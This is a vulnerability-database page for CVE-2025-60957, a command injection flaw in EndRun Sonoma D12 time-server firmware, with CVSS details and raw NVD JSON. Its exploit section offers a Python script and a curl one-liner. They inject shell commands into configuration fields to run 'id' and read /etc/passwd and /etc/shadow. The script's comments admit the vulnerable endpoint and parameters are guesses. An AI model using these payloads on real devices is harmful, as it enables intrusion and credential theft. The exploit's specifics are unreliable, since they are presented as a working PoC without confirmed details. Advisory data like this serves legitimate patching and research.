Security Vulnerability Report
中文
CVE-2025-60957 CVSS 9.9 CRITICAL

CVE-2025-60957

Published: 2025-10-06 17:16:06
Last Modified: 2025-10-10 16:36:15

Description

OS Command Injection vulnerability in EndRun Technologies Sonoma D12 Network Time Server (GPS) F/W 6010-0071-000 Ver 4.00 allows attackers to execute arbitrary code, cause a denial of service, gain escalated privileges, and gain sensitive information.

CVSS Details

CVSS Score
9.9
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:endruntechnologies:sonoma_d12_firmware:6010-0071-000:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:endruntechnologies:sonoma_d12:4.00:*:*:*:*:*:*:* - NOT VULNERABLE
EndRun Technologies Sonoma D12 Network Time Server F/W 6010-0071-000 Ver 4.00

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-60957 - EndRun Sonoma D12 OS Command Injection PoC # Author: Security Researcher # Description: Demonstrates OS command injection via authenticated web interface import requests import sys TARGET_URL = "https://<target-ip>/" USERNAME = "low_priv_user" PASSWORD = "password123" # Malicious payload - injects OS command via vulnerable parameter # Example: injecting into a diagnostic or configuration field INJECTION_PAYLOAD = "; id; uname -a; cat /etc/passwd; #" def exploit(): session = requests.Session() # Step 1: Authenticate with low-privilege credentials login_url = f"{TARGET_URL}/login.cgi" login_data = { "username": USERNAME, "password": PASSWORD } resp = session.post(login_url, data=login_data, verify=False) if resp.status_code != 200: print("[-] Authentication failed") sys.exit(1) print("[+] Authenticated successfully") # Step 2: Inject OS command via vulnerable parameter # The vulnerable endpoint may vary; common candidates include # NTP config, hostname settings, or diagnostic tools exploit_url = f"{TARGET_URL}/config.cgi" exploit_data = { "ntp_server": INJECTION_PAYLOAD, "hostname": INJECTION_PAYLOAD, "timezone": INJECTION_PAYLOAD } resp = session.post(exploit_url, data=exploit_data, verify=False) # Step 3: Check for command execution indicators if "uid=" in resp.text or "root" in resp.text: print("[+] Command injection successful!") print(resp.text) else: print("[*] Response received, check manually") print(resp.text[:500]) if __name__ == "__main__": requests.packages.urllib3.disable_warnings() exploit() # Alternative exploitation via direct curl command: # curl -k -u "user:pass" -d "ntp_server=;cat /etc/shadow;#" https://target/config.cgi

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60957", "sourceIdentifier": "[email protected]", "published": "2025-10-06T17:16:06.497", "lastModified": "2025-10-10T16:36:14.710", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OS Command Injection vulnerability in EndRun Technologies Sonoma D12 Network Time Server (GPS) F/W 6010-0071-000 Ver 4.00 allows attackers to execute arbitrary code, cause a denial of service, gain escalated privileges, and gain sensitive information."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:endruntechnologies:sonoma_d12_firmware:6010-0071-000:*:*:*:*:*:*:*", "matchCriteriaId": "6F239BEA-C83D-46D5-A558-478D6F01A27A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:endruntechnologies:sonoma_d12:4.00:*:*:*:*:*:*:*", "matchCriteriaId": "2D229C97-27FA-4DC6-9EB9-7757C6638143"}]}]}], "references": [{"url": "http://endrun.com", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "http://sonoma.com", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://xdiv-sec.github.io/vulnerability-research/advisories/2025-10-03-sonoma-d12", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}